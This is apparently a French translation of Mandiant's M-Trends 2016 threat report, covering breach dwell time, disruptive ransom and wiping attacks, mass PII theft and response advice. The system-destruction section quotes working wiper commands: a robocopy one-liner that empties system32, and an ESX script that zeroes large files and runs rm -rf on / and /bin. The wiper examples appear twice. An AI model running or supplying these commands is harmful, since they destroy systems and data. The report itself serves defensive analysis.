MANDIANT CONSULTING M-TRENDS 2016 - Bitpipedocs.media.bitpipe.com/.../rpt-mtrends-2016_FR.pdf · NP...

RAPPORT SPÉCIAL / M-TRENDS 2016 1NP RAPPORT SPÉCIAL / M-TRENDS 2016

RAPPORT SPÉCIAL / FÉVRIER 2016

M-TRENDS

2016 MANDIANT CONSULTING

SOMMAIRE

Avant-propos 3

Les chiffres clés 6

Tendances 2015 1re tendance : David contre Goliath — 9 L'essor des attaques disruptives 2e tendance : Une affaire personnelle 16 3e tendance : Les attaques ciblant les équipements 19

réseau d'entreprise

Rétrospective : quand les tendances s'installent dans la constance Fournisseurs de services : une porte d'entrée 22 vers leurs clients Persistance sous Windows 28

La résurgence des simulations d'attaque 36

FaaS : détection des attaquants et intervention en temps réel et à grande échelle 44

Conclusion 47

2 RAPPORT SPÉCIAL / M-TRENDS 2016

AVANT-PROPOS

COMME CHAQUE ANNÉE, MANDIANT EST INTERVENU SUR DE NOMBREUSES COMPROMISSIONS DE SÉCURITÉ LARGEMENT RELAYÉES DANS LES MÉDIAS EN 2015. NOUS AVONS CEPENDANT OBSERVÉ DEUX DIFFÉRENCES IMPORTANTES :

1. Le nombre d'intrusions rendues publiques (de manière volontaire ou non) a atteint un niveau record.

2. L'origine géographique et les motivations des attaquants étaient plus diversifiées.

3

RAPPORT SPÉCIAL / M-TRENDS 2016 54 RAPPORT SPÉCIAL / M-TRENDS 2016

En 2015, la nature des attaques étudiées par nos équipes semble confirmer le retour à un équilibre entre pirates situés en Chine et dans d'autres pays. Mandiant s'est retrouvé face à davantage d'attaquants basés en Russie (à la fois des groupes financés par l'État russe et des cybercriminels aux motivations d'ordre financier). Nous avons également constaté une poussée des groupes « mercenaires » qui monnaient leurs services au plus offrant. Enfin, nos équipes ont noté une augmentation significative de l'emploi de monnaies dérégulées, comme le Bitcoin, lors des demandes de rançon. (Pour plus de détails, reportez-vous à la section sur les attaques disruptives.)

Dans cette édition 2016, nous commencerons par parcourir nos fameuses statistiques annuelles des compromissions de sécurité, avant de faire le point sur les trois nouvelles grandes tendances observées et les tendances anciennes qui s'installent progressivement dans la constance. Enfin, les deux derniers chapitres viendront étayer notre interprétation des chiffres présentés dans ces pages. Le premier aborde le renouveau des opérations de simulation d'attaques, tandis que le second est consacré au rôle de notre gamme de solutions FireEye as a Service (FaaS) dans la protection des entreprises et la réduction de la durée des compromissions.

Si les chiffres parlent souvent d'eux-mêmes, leur véritable intérêt réside cependant dans l'interprétation que l'on en fait. En 2015, il s'est écoulé en moyenne 146 jours entre le moment où une entreprise a été compromise et celui où elle a identifié l'intrusion (ou en a été informée par un tiers). L'évolution reste

donc très positive par rapport à nos premières statistiques de 2012, où cette période était de 416 jours. Qui plus est, elle était de 205 jours en 2014, soit une baisse de plus de 50 jours en 2015. De toute évidence, les acteurs de la cybersécurité ont amélioré leurs capacités de détection des compromissions.

Cela étant, la route est encore longue. L'équipe Mandiant chargée de reproduire les méthodes susceptibles d'être utilisées par les attaquants (« red team ») parvient en moyenne à se procurer les identifiants d'un administrateur de domaine à peine trois jours après s'être introduite dans un environnement. En d'autres termes, une fois un attaquant en possession de ces autorisations, il ne met que peu de temps à faire main basse sur les informations qu'il convoite. Si l'on en croît ce constat, 146 jours, c'est donc encore au moins 143 jours de trop. Point positif : la moyenne chute à 56 jours dans les entreprises qui ont détecté la compromission par elles-mêmes. En conclusion, les acteurs de la sécurité informatique ont haussé leur niveau de jeu, mais il reste encore beaucoup à faire.

Mandiant est bien conscient du fait que sa statistique de durée moyenne de compromission est biaisée, et l'a toujours été. Elle se fonde sur les cas pour lesquels nous sommes intervenus. Les entreprises qui détectent rapidement une compromission elles-mêmes, ou qui la résolvent sans faire appel à Mandiant, ne sont pas prises en compte dans ces chiffres. Pourtant, nous pensons qu'indépendamment des valeurs en soi, ils constituent un bon indicateur des progrès réalisés en matière de sécurité informatique au fil des ans.

En 2015, un nombre sans précédent de compromissions de sécurité ont été révélées publiquement. Les victimes de ces attaques subissent alors des pressions qui redéfinissent les missions des acteurs de la sécurité informatique. En cas de compromission de leur sécurité, les entreprises doivent maintenant tenir compte de l'opinion publique, en plus de leurs obligations statutaires et réglementaires et des risques d'actions en justice. Au cours de certaines de nos missions d'intervention, nous avons constaté que l'entreprise agissait sous le joug de pressions externes qui l'empêchaient de se concentrer sur l'analyse de l'incident et sa remédiation.

La confidentialité de nos clients est essentielle à nos yeux. Dès lors, nous préservons leur anonymat dans tous nos rapports M-Trends, même si eux-mêmes déclarent publiquement qu'ils collaborent avec Mandiant.


La tendance la plus intéressante de 2015 a été l'augmentation du nombre de nos interventions sur des attaques dites « disruptives ». Ces attaques peuvent employer diverses méthodes : garder des données en otage contre une rançon (ex. CryptoLocker) ; faire chanter une entreprise en la menaçant de divulguer des données volées ; supprimer des données ou endommager des systèmes ; insérer du code malveillant dans un référentiel de code source ; ou modifier secrètement des données métiers critiques.

La deuxième nouvelle tendance que nous étudierons concerne l'exfiltration massive d'informations d'identification personnelle (PII) d'entreprises ciblées par des pirates informatiques chinois. Le vol de telles informations n'est pas un phénomène nouveau, mais il a atteint des proportions inédites en 2015.

Enfin, la troisième tendance récente porte sur l'exploitation du matériel réseau lors de campagnes persistantes et ciblées. Ces équipements sont compromis pour différentes raisons : conserver un accès persistant, modifier des listes de contrôle d'accès afin d'infiltrer un environnement protégé, réaliser des opérations de reconnaissance ou perturber le trafic réseau.

On observe également deux tendances récurrentes d'année en année, à tel point qu'elles se sont établies comme de véritables constantes : la persistance des menaces et l'exploitation de tiers pour accéder à l'entreprise ciblée. La persistance est une pratique appelée à perdurer, car ses mécanismes sont nécessaires aux cyberpirates pour conserver un accès à long terme à un environnement. En ce sens, nous avons étudié certains nouveaux mécanismes innovants. Si les pirates tendent à passer par un fournisseur de services ou un sous-traitant de l'entreprise réellement visée, c'est parce que le plus souvent, la sécurité de ce fournisseur est plus friable que celle de la cible finale. De plus, étant donné la confiance que leur accordent généralement leurs clients, les fournisseurs offrent aux attaquants une porte d'entrée facile et fiable vers l'environnement visé.

Toutes ces tendances observées nous amènent à une seule conclusion : il est plus indispensable que jamais d'aborder la question de la sécurité sous tous ses aspects — l'humain, les processus et les technologies. Cette édition du rapport M-Trends alimentera sans aucun doute vos arguments en faveur d'un resserrement de votre sécurité.


Secteurs d'activité ciblés (tels que recensés par Mandiant)

Hautes technologies 13 %

Services aux entreprises 11 %

Services financiers et assurances 10 %

Médias et divertissement 11 %

Commerce et distribution 10 %

Biotechnologies et pharmaceutique 7 %

Construction et ingénierie 6 %

Santé 5 %

Transport 3 %

Services juridiques 3 %

Télécommunications 2 %

Énergie 1 %

Secteur agricole et forestier 1 %

Organismes publics et internationaux 3 %

Aérospatiale et défense 5 %

Enseignement 8 %

LES CHIFFRES CLÉS


Qui découvre la compromission ?

Temps moyen entre la compromission initiale et sa découverte

Toutes les interventions sur incidents de Mandiant en 2015

Notification par un tiers Détection en interne

146 jours 320 jours 56 joursFréquence du spear phishing en fonction du jour de la semaine

JOUR POURCENTAGE

Dimanche 0 %

Lundi 11 %

Mardi 11 %

Mercredi 29 %

Jeudi 20 %

Vendredi 18 %

Samedi 10 %

47 %

53 %

Jour

de

la s

emai

ne a

uque

l l'e

-mai

l a é

té e

nvoy

é

5 % 10 % 15 % 20 % 25 % 30 % 35 %

Pourcentage d'e-mails de spear phishing par rapport au nombre total

0 %

Samedi

Vendredi

Jeudi

Mercredi

Mardi

Lundi

Dimanche

Un tiers qui en informe l'entreprise

L'entreprise elle-même


Six SOC à travers le monde assurant des services de détection et d'intervention sur incidents 24 h/24 et 7 j/7

• Milpitas (États-Unis)• Reston (États-Unis)• Dublin (Irlande)• Singapour• Tokyo (Japon)• Sydney (Australie)

Visibilité réseau pour plus de 4 millions d'hôtes, dont 2,8 millions bénéficient de fonctionnalités complètes pour terminaux

2,8 Mio Des centaines de clients dans des dizaines de secteurs

À l'échelle mondiale, FireEye as a Service (FaaS) utilise près de 4 000 équipements appartenant directement à FireEye ou à ses clients.

4 000100aines 6

LES SERVICES FAAS EN CHIFFRES POUR L'ANNÉE 2015


4 000

L'ESSOR DES ATTAQUES DISRUPTIVESDAVID CONTRE GOLIATH

1RE TENDANCE

L'année dernière, Mandiant est intervenu sur de nombreux incidents au cours desquels des pirates avaient détruit des systèmes métiers critiques, dévoilé des données confidentielles, rançonné des entreprises ou provoqué des cadres dirigeants. Profit financier, actions de représailles politiques ou désir de discréditer l'entreprise visée : les motivations varient.

Une cyberattaque destinée à perturber les activités d'une entreprise n'est plus un scénario fantaisiste. L'année écoulée nous a montré que de telles attaques ont bel et bien lieu, et qu'elles ont un véritable impact sur les structures de tous types et de toutes tailles. Certaines ont été menées volontairement à la vue de tous, avec des fuites de données ou des demandes de rançon ayant pour but de porter atteinte ou de causer un préjudice aux victimes. À l'inverse, nous avons observé des incidents où les attaquants ont préféré garder l'anonymat, le plus souvent pour demander le paiement d'une rançon, sous peine de divulguer des données volées.

En 2015, nous avons constaté une multiplication de ce que l'on peut appeler des attaques « disruptives ». Si presque toutes les attaques perturbent les activités d'une manière ou d'une autre, celles dont il est question ici ont pour but de capter

l'attention ou de promouvoir la cause défendue par leurs auteurs. Elles s'opposent en cela aux techniques traditionnelles lentes et discrètes, employées pour conserver un accès aux réseaux d'entreprise infiltrés et mettre la main sur des données sans se faire repérer.

Ces coups d'éclat ont entraîné la divulgation publique de données confidentielles, portant ainsi atteinte à la réputation des entreprises victimes. Dans certains cas, une panne de systèmes critiques a paralysé le fonctionnement même de l'entreprise. Ajoutons à cela des demandes de rançons astronomiques, des dépenses importantes dans la restauration des systèmes et même la démission de certains cadres dirigeants.

Les attaques ciblées classiques sont des opérations au long cours, le pirate s'efforçant de masquer sa présence et ses activités dans l'environnement cible. Il s'agit là d'un dénominateur

commun, quel que soit le type de données convoitées : secrets commerciaux, capital intellectuel, dossiers clients, informations de paiement ou toutes autres données sensibles. Dans le cas des attaques disruptives, au contraire, les pirates cherchent à attirer l'attention sur leurs activités malveillantes ou sur les informations dérobées.

Ce type d'attaque va probablement gagner du terrain au regard de son impact très fort et de son coût réduit. On qualifie parfois ces attaques d'« asymétriques » car elles causent souvent des dommages considérables et disproportionnés par rapport au peu de compétences techniques ou de ressources dont doivent disposer leurs auteurs.

Pour illustrer notre propos, nous avons sélectionné quatre scénarios basés sur des incidents auxquels nos clients ont été confrontés l'an dernier.

TENDANCES 2015


Demandes de rançon

L'année dernière, nous avons enregistré une hausse significative du nombre de tentatives de chantage par voie électronique. Généralement, les auteurs menacent de divulguer publiquement des données volées à moins que la victime ne paie une généreuse rançon. Cette rançon prend souvent la forme de monnaies numériques dérégulées telles que le Bitcoin.

Dans les affaires que nous avons traitées, avec une exception notable, la somme exigée était proportionnelle à la valeur des données prises en otage, le but étant de favoriser le paiement de la rançon. En effet, si celle-ci est trop importante, elle ne sera probablement jamais versée. Dans un cas exceptionnel, la rançon était étonnamment modique, alors que le maître-chanteur semblait connaître la valeur réelle des données volées. Ce cas a été étudié de très près par l'entreprise et par les autorités judiciaires car elles soupçonnaient des intentions cachées.

La plupart des affaires de chantage contre rançon que nous avons traitées suivaient le même scénario. L'attaquant envoie un e-mail à un cadre dirigeant, l'informant que certaines données sensibles ont été volées et seront divulguées publiquement à une date donnée si l'entreprise ne verse pas une certaine somme.

Dans tous ces cas, la date butoir ne laissait jamais le temps de mener une enquête digne de ce nom. Dès lors, nous avons plutôt tenté de déterminer la crédibilité des allégations des pirates. Parfois, nous avons pu prouver la réalité de la fuite de données annoncée, mais dans certains cas, nous en avons été incapables avant l'échéance fixée pour la rançon.

La question suivante est bien évidemment de savoir s'il faut ou non payer la rançon. Chaque situation est unique et doit être considérée au cas par cas. Il n'y a donc pas de réponse absolue à cette question. Même si la rançon est versée, il existe toujours une possibilité que le pirate dévoile tout de même les données au grand public.

Au cours de l'une de nos missions, le maître-chanteur affirmait avoir accès à des milliers de dossiers clients de l'entreprise. En guise de preuve, il a fourni des informations confidentielles sur quelques clients, et réclamé une rançon pour ne pas publier le reste des données volées. Au fil de l'enquête, l'individu a prolongé le délai à plusieurs reprises sans mettre sa menace à exécution. Nos soupçons se sont portés sur une source interne : nous avons analysé son système et trouvé des preuves de son implication. L'entreprise et les services de police l'ont interrogé et il a avoué les faits. Le coupable a été licencié, la rançon n'a pas été payée et aucune donnée client n'a été divulguée.

Bien qu'ils ne soient généralement pas le fait d'intrusions ciblées, nous fauterions par omission si nous ne citions pas les rançongiciels (ou ransomwares) de base tels que CryptoLocker, qui a déjà frappé des dizaines de milliers d'entreprises et de particuliers. Mandiant a reçu des centaines d'appels signalant que des fichiers avaient été cryptés par de nombreuses variantes de ransomware. Ces menaces démontrent l'impact significatif que peuvent avoir des attaques automatisées et non ciblées.


Destruction de systèmes critiques

Nous avons étudié de nombreux incidents au cours desquels les attaquants ont effacé le contenu de systèmes d'entreprise critiques et, dans certains cas, obligé leurs cibles à se rabattre sur le support papier et le téléphone pendant des jours, voire des semaines, le temps de restaurer les systèmes et les données en question. Nous avons même constaté des cas où l'infrastructure de sauvegarde des systèmes avait été vidée de son contenu dans le but d'immobiliser encore plus longtemps les entreprises victimes.

Exemple 1 : Un attaquant avait créé une tâche planifiée qui supprimait le répertoire Windows au moyen de l'outil robocopy de Microsoft sur certains systèmes critiques de l'environnement. Le script commençait par créer un nouveau répertoire appelé c:\emptydir, qui ne contenait aucun fichier. Ensuite, il exécutait robocopy avec des paramètres de ligne de commande pour permettre de copier l'arborescence de répertoires de c:\emptydir vers c:\windows\system32. Comme le répertoire c:\emptydir ne contenait aucun fichier ni répertoire, le contenu de c:\windows\system32 était effacé. Parallèlement à l'exécution de robocopy, le script exécutait la commande shutdown qui éteignait le système après 30 minutes (1 800 secondes). Lorsqu'un administrateur redémarrait les systèmes touchés, Windows ne bootait plus. La tâche planifiée est illustrée ci-dessous.

mkdir "C:\emptydir"robocopy "C:\emptydir" "C:\windows\system32" /MIR | shutdown /s /t 1800

Exemple 2 : Après avoir obtenu un accès d'administrateur de domaine dans l'environnement Active Directory de sa cible, un pirate a essayé de distribuer un ransomware via des tâches planifiées et des objets Stratégie de groupe (GPO). Une fois la tâche créée, il l'a distribuée aux systèmes cibles à l'aide de GPO. La tâche a chargé un script malveillant depuis le contrôleur de domaine. Ce script a ensuite copié puis lancé un exécutable du contrôleur de domaine sur les systèmes cibles. L'exécutable cryptait des fichiers utilisateur (documents, photos, e-mails, sauvegardes, etc.) sur le système de fichiers, puis invitait l'utilisateur à se rendre sur un site Web contenant des instructions pour obtenir la clé de décryptage.

La plupart des pirates visés par nos enquêtes ces dernières années disposaient des accès et privilèges système requis pour détruire les environnements technologiques et paralyser les opérations de nos clients. Malgré cela, ils ont plutôt choisi de voler discrètement des données de carte de crédit, des informations personnelles et du capital intellectuel.

D'autres agissent par contre au grand jour, et cherchent à perturber les activités de leurs cibles pour mieux les discréditer. Leur sophistication et leurs moyens d'action couvrent tout le spectre, des amateurs jusqu'aux groupes à la solde d'États. Voici quelques exemples de techniques d'effacement de systèmes que nous avons pu observer.


Exemple 3 : Un pirate a créé plusieurs variantes d'un malware destinées à effacer le contenu de systèmes Windows, pour ensuite se propager à d'autres systèmes du réseau. Chaque variante suivait une procédure propre à la fonction du système Windows. Dans le cas du contrôleur de domaine, elle retardait la destruction pour que le serveur puisse continuer à fournir les services d'authentification Windows, ce qui permettait au malware de se propager plus largement.

Les différentes versions du malware présentaient d'autres spécificités :

1. Poste de travail : le malware arrêtait les processus antivirus et écrivait un enregistrement MBR personnalisé sur le disque.

2. Serveur : il désactivait les services Terminal Server.3. Serveur de messagerie : il arrêtait le service de messagerie et désactivait les services

Terminal Server.4. Contrôleur de domaine : il désactivait les services Terminal Server et exécutait le code

d'effacement après un certain délai, pour permettre la propagation du malware.

Exemple 4 : Un pirate a créé un script d'effacement qui différait pour chaque système Linux ou Mac de l'environnement. Par exemple, le code ci-dessous devait être exécuté sur les serveurs ESX pour les désactiver et rendre inaccessibles toutes les machines virtuelles qu'ils hébergeaient. Le script recherchait des fichiers de grande taille, y écrivait partiellement des zéros, puis supprimait les fichiers système.

find / -type f -name “*.*” | grep -v “disks” | grep -v “\/dev” | awk ‘{print “ls -l \”” $0 “\”” }’ |sh | awk ‘{if ($5>524288000) print “dd if=/dev/zero of=\”” $9 “\” bs=512k count=400 seek=400 conv=notrunc,noerror > /dev/null 2>&1 &”}’ | shsleep 1rm -r -f /boot/* &rm -r -f /vmfs/* &rm -r -f /* & rm -f /bin/* /sbin/* &exit

Le code ci-dessus peut être interprété de la manière suivante :

1. Rechercher dans l'intégralité du système de fichiers tout nom de fichier correspondant à l'expression régulière *.*, ne contenant pas le mot « disks » et dont le chemin ne contient pas « /dev ».

2. Vérifier si le fichier a une taille supérieure à 524 Mo.3. Si c'est le cas, alors rechercher 400 blocs de 512 Ko dans le fichier et écrire 200 Mo de zéros.4. Supprimer tout le contenu de /boot.5. Supprimer tous les volumes sous /vmfs.6. Commencer à supprimer tout le contenu du système de fichiers.7. Supprimer des fichiers binaires importants de /sbin et /bin.


Exemple 3 : Un pirate a créé plusieurs variantes d'un malware destinées à effacer le contenu de systèmes Windows, pour ensuite se propager à d'autres systèmes du réseau. Chaque variante suivait une procédure propre à la fonction du système Windows. Dans le cas du contrôleur de domaine, elle retardait la destruction pour que le serveur puisse continuer à fournir les services d'authentification Windows, ce qui permettait au malware de se propager plus largement.

Les différentes versions du malware présentaient d'autres spécificités :

1. Poste de travail : le malware arrêtait les processus antivirus et écrivait un enregistrement MBR personnalisé sur le disque.

2. Serveur : il désactivait les services Terminal Server.3. Serveur de messagerie : il arrêtait le service de messagerie et désactivait les services

Terminal Server.4. Contrôleur de domaine : il désactivait les services Terminal Server et exécutait le code

d'effacement après un certain délai, pour permettre la propagation du malware.

Exemple 4 : Un pirate a créé un script d'effacement qui différait pour chaque système Linux ou Mac de l'environnement. Par exemple, le code ci-dessous devait être exécuté sur les serveurs ESX pour les désactiver et rendre inaccessibles toutes les machines virtuelles qu'ils hébergeaient. Le script recherchait des fichiers de grande taille, y écrivait partiellement des zéros, puis supprimait les fichiers système.

find / -type f -name “*.*” | grep -v “disks” | grep -v “\/dev” | awk ‘{print “ls -l \”” $0 “\”” }’ |sh | awk ‘{if ($5>524288000) print “dd if=/dev/zero of=\”” $9 “\” bs=512k count=400 seek=400 conv=notrunc,noerror > /dev/null 2>&1 &”}’ | shsleep 1rm -r -f /boot/* &rm -r -f /vmfs/* &rm -r -f /* & rm -f /bin/* /sbin/* &exit

Publication de données d'entreprise sensibles sur Internet

Nous avons collaboré avec un certain nombre de clients dont des données sensibles ont été publiées sur Internet. La raison ? Ils n'ont pas cédé à une demande de rançon ou l'attaquant cherchait simplement à les discréditer.

Les pirates utilisent souvent des plates-formes de partage très fréquentées telles que Pastebin1 pour publier leurs « manifestes ». E-mails professionnels, dossiers du personnel, identifiants volés ou encore copies de bases de données : ces informations d'entreprise sensibles peuvent ainsi se retrouver directement sur le site même, ou, au moyen de liens, être accessibles en téléchargement à partir d'autres sites de partage.

Les pirates peuvent aussi recourir à des sites de partage de photos pour publier des captures d'écran, prouvant ainsi qu'ils ont accès à l'environnement

de la victime. Grâce aux procédures formelles de signalement des abus offertes par ces sites, un grand nombre de nos clients ont pu faire supprimer rapidement leurs contenus non autorisés. Cela dit, comme ils savent que les sites de partage soucieux de leur réputation ne tardent pas à éliminer les contenus douteux, les pirates se tournent souvent vers d'autres plates-formes telles que ThePirateBay, des trackers BitTorrent et des sites peer-to-peer.

Ils contactent même parfois les médias pour braquer au maximum les projecteurs sur leur victime avant que le contenu ne soit supprimé de la vitrine publique.

Camouflage

Malgré le caractère souvent audacieux des attaques disruptives, les pirates évitent généralement de révéler leur identité par crainte de représailles ou de poursuites judiciaires.

Dans un cas précis, un pirate affirmait être originaire de Russie et communiquait en russe. Nos linguistes ont analysé plusieurs de ses communications et en ont conclu que son niveau de langue, notamment certaines traductions littérales de termes techniques anglais, était trop médiocre pour être celui d'un russophone. Ces mauvaises traductions et d'autres preuves techniques relevées au cours de l'enquête nous ont conduits à la conclusion que le pirate utilisait probablement un logiciel de traduction lorsqu'il communiquait en russe.

Un autre cas impliquait un pirate qui affirmait ne pas parler anglais, mais il s'est révélé rapidement qu'il s'agissait d'un anglophone instruit. Au départ, il utilisait un logiciel de traduction automatique pour communiquer, mais il finissait parfois par s'exprimer dans un anglais fluide lorsque cela l'arrangeait.

1 Pastebin est une plate-forme publique qui permet de publier des textes sans devoir créer un compte.

AVÉREZ LA COMPROMISSION EFFECTIVE DE VOTRE SÉCURITÉ – L'annonce d'un piratage n'en fait pas nécessairement une réalité. Les tentatives de bluff sont monnaie courante. Avant de payer une rançon, recherchez dans votre environnement toute preuve éventuelle de compromission. Si le maître-chanteur présente des données pour étayer sa requête, vérifiez leur véracité et assurez-vous qu'elles proviennent bien de votre environnement.

RAPPELEZ-VOUS QUE VOUS VOUS ADRESSEZ À UNE PERSONNE – Ce facteur humain la rend donc imprévisible et ses réactions peuvent parfois être plus émotionnelles que rationnelles. Anticipez les réactions possibles du pirate face à vos actions, ou à votre inaction. Il peut se montrer plus agressif s'il perd son sang-froid. À l'inverse, il pourrait vous accorder plus de temps s'il pense que vous essayez de répondre à ses exigences.

CHAQUE MINUTE COMPTE – Validez et évaluez la portée de la compromission aussi rapidement que possible. Pour ce faire, votre équipe devra peut-être travailler les soirs et les weekends : soyez donc attentif aux signes de fatigue excessive et de surmenage. Il se peut que vous deviez approuver des demandes de changement de personnel en urgence.

RESTEZ CONCENTRÉ – Il est facile de se laisser distraire. Faites le point sur les tâches entreprises et déterminez leur capacité à limiter, détecter, neutraliser ou endiguer l'attaque. Une intervention sur incident est un contre-la-montre. Concentrez-vous sur l'essentiel plutôt que sur le facultatif. Sachez qu'il vous faudra peut-être mettre en œuvre diverses solutions temporaires pour gérer l'attaque.

PESEZ LE POUR ET LE CONTRE AVANT DE COMMUNIQUER AVEC L'AUTEUR DE L'ATTAQUE – Les pirates n'attendent pas toujours une réaction de la part de l'entreprise. Certains vont passer leur chemin s'ils ne visaient pas spécifiquement la vôtre (surtout s'ils ont ratissé large en exploitant une vulnérabilité présente dans des centaines d'entreprises). D'autres pourraient être agacés par votre silence. Si vous décidez de communiquer avec le pirate, limitez ces interactions et pesez bien vos mots. Prenez éventuellement conseil auprès des autorités policières ou d'un avocat avant toute communication.

1 2 3 4 5

Étant donné la nature dynamique des attaques à vocation perturbatrice et de leurs auteurs, l'intervention est délicate et difficile à planifier. Contrairement aux exfiltrations furtives d'informations qu'un plan de confinement permet de neutraliser, dans les affaires de chantage, il est probablement déjà trop tard lorsque

le pirate contacte sa victime. Dès lors, l'intervention se doit d'être différente. Pour vous aider à mieux faire face aux attaques disruptives, nous vous livrons ci-dessous dix grands principes directement issus de nos missions d'intervention sur incidents :

Les leçons tirées des enquêtes sur les attaques disruptives


ENGAGEZ DES EXPERTS DE MANIÈRE PRÉVENTIVE – Pour garder la tête hors de l'eau en cas d'attaque disruptive, vous aurez besoin du soutien d'experts en analyse forensique, en questions juridiques et en relations publiques. Identifiez les bons partenaires au préalable et signez un contrat avec eux.

ENVISAGEZ TOUTES LES ÉVENTUALITÉS SI UNE RANÇON VOUS EST DEMANDÉE – Sachez que le paiement de la rançon peut être la solution dans certains cas, mais il n'est pas garanti que, par la suite, les pirates ne vous somment pas de débourser davantage ou qu'ils ne publient pas les données malgré tout. Demandez l'avis d'experts avant de prendre une décision et soyez conscient des risques inhérents à chaque option.

SEGMENTEZ ET CONTRÔLEZ EFFICACEMENT VOS SAUVEGARDES – La plupart des entreprises ont des politiques de sauvegarde matures qui assurent une restauration rapide des systèmes en cas de défaillance. Toutefois, il est courant que les systèmes hébergeant les sauvegardes fassent partie de l'environnement compromis par le pirate. Renforcez les restrictions d'accès à vos sauvegardes pour limiter tout risque de suppression une fois que l'attaquant s'est infiltré dans le système à l'aide d'identifiants compromis.

UNE FOIS L'INCIDENT RÉGLÉ, CONCENTREZ-VOUS IMMÉDIATEMENT SUR UN RENFORCEMENT GÉNÉRAL DE LA SÉCURITÉ – Indépendamment de l'issue de l'incident, assurez-vous que l'attaquant ne pourra pas se réintroduire pour provoquer encore plus de dommages. De même, il ne faudrait pas qu'un autre pirate ait l'idée de vous prendre pour cible en partant du principe que vous êtes un bon payeur. Veillez à bien cerner le périmètre de la compromission, et mettez en œuvre un plan d'action tactique et stratégique pour bloquer l'accès à tout autre attaquant.

SOYEZ CONSCIENT DU FAIT QUE RIEN N'EMPÊCHE UN PIRATE EXPULSÉ DE RETENTER SA CHANCE PAR D'AUTRES MÉTHODES – N'oubliez pas de pérenniser et de renforcer les solutions temporaires déployées pour neutraliser l'attaque. Réalisez des tests d'intrusion et des simulations d'attaque pour vérifier la fiabilité de vos contrôles de sécurité, identifier les vulnérabilités et les éliminer immédiatement.

6 7 8 9 10

Conclusion

Auparavant considérées comme improbables par de nombreuses entreprises, les attaques disruptives n'apparaissaient généralement pas dans les plans de sécurité des dirigeants. Concrètement, personne n'imaginait que la moitié du personnel puisse se voir privé d'accès aux systèmes en un laps de temps très court.

Cependant, les incidents fortement médiatisés de ces dernières années ont forcé les entreprises à revoir leur copie en matière de scénario catastrophe. Comme nous l'avons constaté, les attaques de perturbation sont devenues un problème bien réel et les entreprises doivent se préparer en conséquence. Idéalement, elles ne doivent rien laisser au hasard pour limiter les dégâts au maximum.

RAPPORT SPÉCIAL / M-TRENDS 2016 15


Au fil de ses missions face à des cyberpirates chinois, Mandiant n'avait jamais observé une telle tendance au vol massif et indifférencié de données PII. Cependant, nous avions connaissance de cas individuels de vols de ce type de données dans le cadre de grandes « razzias » au cours desquelles l'attaquant faisait main basse sur toutes les données d'un serveur de fichiers, parmi lesquelles se trouvaient des données PII ne présentant aucun intérêt particulier pour lui.

Nos investigations menées l'année dernière sur plusieurs vols massifs de données PII, vraisemblablement orchestrés depuis la Chine, nous ont conduits à reconsidérer notre analyse.

L'année dernière, Mandiant est intervenu sur plusieurs attaques ciblées lors desquelles des informations d'identification personnelle (PII) ont été volées par des cyberpirates liés à la Chine. Le volume des données dérobées laisse supposer que l'objectif était la collecte massive de données PII, et pas uniquement celles d'individus précis.

UNE AFFAIRE PERSONNELLE

2E TENDANCE :

Plusieurs secteurs ont été touchés, dont la santé, le tourisme, les services financiers et les organismes publics. Nous soupçonnions au départ que les pirates visaient en particulier les dossiers médicaux et informations de carte de crédit, mais nous n'avons pas trouvé de preuves pour étayer cette hypothèse. Nous avons cependant observé que les informations ciblées et exfiltrées pouvaient être utilisées pour vérifier les identités (numéros de sécurité sociale, noms de jeune fille de la mère, dates de naissance, noms des anciens employeurs, associations de questions/réponses d'identification, etc.) des personnes concernées.


Les attaques par phishing tiennent toujours le haut du pavé, comme ce cas vient tristement nous le rappeler. L'entrée en matière : un e-mail de phishing classique incitant le destinataire à suivre un lien vers du contenu malveillant. Un simple clic sur le lien a provoqué le téléchargement d'une backdoor, qui a octroyé au pirate un accès à l'environnement de la cible. Après s'être infiltré, celui-ci a focalisé ses activités de reconnaissance sur l'identification des bases de données contenant un maximum d'informations d'identification personnelle.

Ensuite, il a accédé aux bases de données en identifiant les DBA et leurs ordinateurs via l'annuaire Active Directory de la victime. Pour ce faire, il a recherché les appartenances aux groupes Active Directory avec le mot clé « database ». Il s'est ensuite déplacé latéralement vers ces systèmes et a extrait des documents lui permettant d'identifier les noms, serveurs et identifiants des bases de données.

ÉTUDE DE CAS

L'attaquant maîtrisait manifestement les systèmes de bases de données Microsoft, Teradata et Oracle, ainsi que les passerelles transactionnelles utilisées pour y accéder. Une fois en possession des informations nécessaires, il a systématiquement testé l'authentification et inventorié les bases de données. Il a ensuite recherché dans les tables des bases les colonnes dont les noms indiquaient des contenus sensibles, comme des numéros de sécurité sociale.

Une fois ces informations identifiées, il en a extrait les champs pour chaque enregistrement dans les bases de données ciblées. Bilan des informations collectées : numéros de sécurité sociale, noms de jeune fille de la mère et dates de naissance. En raison du volume de données extraites, le pirate a probablement :

1. Extrait les informations par segments (entre 100 000 et 1 000 000 d'enregistrements à la fois)

2. Compressé les informations sous forme de fichiers archives scindés en plusieurs parties

3. Chargé les fichiers compressés contenant les données PII sur des sites de partage

Comment un cyberpirate basé en Chine a fait main basse sur une quantité massive d'informations d'identification personnelle (PII)

1. Le pirate interroge la base de données pour identifier les colonnes contenant les informations d'identification personnelle.

2. Après avoir identifié ces informations, il divise les requêtes en segments plus gérables.

3. Ensuite, il compresse et charge les données PII collectées sur des sites publics de partage de fichiers.

SYSTÈME COMPROMIS


Motivations potentielles du vol d'informations d'identification personnelle

L'intérêt porté par les cyberpirates chinois aux informations d'identification personnelle a soulevé plusieurs questions, notamment celle des perspectives qu'elles offrent aux autorités d'un pays. La question se pose d'autant plus que les attaques passées visaient des informations de R&D ou de fusions-acquisitions. Si Mandiant n'a toujours pas élucidé le mystère de l'exploitation des données PII volées, ses experts avancent cependant plusieurs hypothèses sur les motivations des attaquants chinois :

Contourner les systèmes de vérification d'identité et de gestion des accèsLes pirates pourraient se servir des données PII volées pour déjouer les dispositifs de vérification et de gestion des identités. Nous voyons souvent des attaquants se servir de comptes utilisateur légitimes, déjà présents dans l'environnement. L'accès aux données PII permet en ce sens de contourner les mécanismes de sécurité basés sur des réponses à des questions personnelles que seul le titulaire légitime du compte est censé connaître. Une fois ces éléments en main, plus rien n'empêche le pirate de compromettre le compte.

Identifier et recruter des « taupes » et des experts dans le cadre d'opérations d'espionnage traditionnelles Un État peut trouver dans des données PII des informations sur d'éventuelles recrues pouvant lui fournir des renseignements. Une fois en possession de données sur la situation financière, les positions idéologiques et la vulnérabilité au chantage d'informateurs potentiels, ses démarches ont plus de chances d'aboutir.

